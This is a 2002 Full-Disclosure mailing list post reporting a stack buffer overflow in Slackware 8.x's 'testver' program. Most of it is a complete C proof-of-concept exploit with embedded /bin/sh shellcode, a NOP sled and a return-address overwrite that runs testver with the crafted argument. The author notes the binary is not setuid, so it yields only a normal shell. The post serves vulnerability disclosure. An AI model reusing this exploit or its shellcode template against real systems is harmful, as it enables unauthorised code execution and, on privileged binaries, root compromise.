[Full-Disclosure] buffer overflow in "testver" on Slackware NOT SETUID ROOT

Wed, 20 Nov 2002 22:48:28 -0800 

Chung's Donut Shop Release
==========================
www.vapid.org/dorian/chungs
For Linux Slackware 8.x

There's a buffer overflow in "testver" on Slackware
8.x. If you pass an argument to testver longer than
4074 bytes it segfaults. Oops. That's plenty of room
to insert shellcode. testver is NOT setuid root. If it
was, the attached proof of concept code would give you
a root shell. Since it's not, the attached code gives
you a normal shell.
              
This issue was found by d4y-j4y and the attatched
proof of lamerness was written by d4y-j4y.
[EMAIL PROTECTED]

Regards,
d4y-j4y
         
     


__________________________________________________
Do you Yahoo!?
Yahoo! Mail Plus � Powerful. Affordable. Sign up now.
http://mailplus.yahoo.com
/*
         Chung's Donut Shop Release
         ==========================
         www.vapid.org/dorian/chungs
         For Linux Slackware 8.x
         There's a buffer overflow in "testver"!! 
         If you pass an argument to testver longer than 4074 bytes
         It segfaults. Oops. That's plenty of room to insert shellcode.
              
         This issue was found by d4y-j4y and this exploit was written
         by d4y-j4y. [EMAIL PROTECTED]
         
         usage:
         $ gcc testver_smash.c -o testver_smash
         $ ./testver_smash
         $
         Not setuid though!!!  ARgh!!
                
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER                         4075 
#define OVERSIZE                       8 

// Ya, you know the shellcode that gives you a shell
char shellcode[] =
   "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp (void)
{
         __asm__("movl %esp, %eax");
}

int main ()
{
         char buffer [BUFFER+OVERSIZE+1];
         unsigned long sp;
         long addy;
         int offset = 8 ;
         int i;
         sp = get_sp ();
         offset = 300;
         addy = sp - offset;

         for( i=BUFFER; i< BUFFER+OVERSIZE; i+=4)
             *(long*)&buffer[i] = addy;

         memset (buffer, 0x90, BUFFER-strlen(shellcode));
         memcpy (buffer + BUFFER - strlen (shellcode), shellcode,strlen(shellcode));
         buffer[BUFFER+OVERSIZE] = '\0';
         printf ("Chung\'s Donut Shop\ntestver smash by d4y-j4y...\n");
         sleep(3);
         execl ("/usr/sbin/testver", "buffer", buffer, NULL);

         return 0;
}

Reply via email to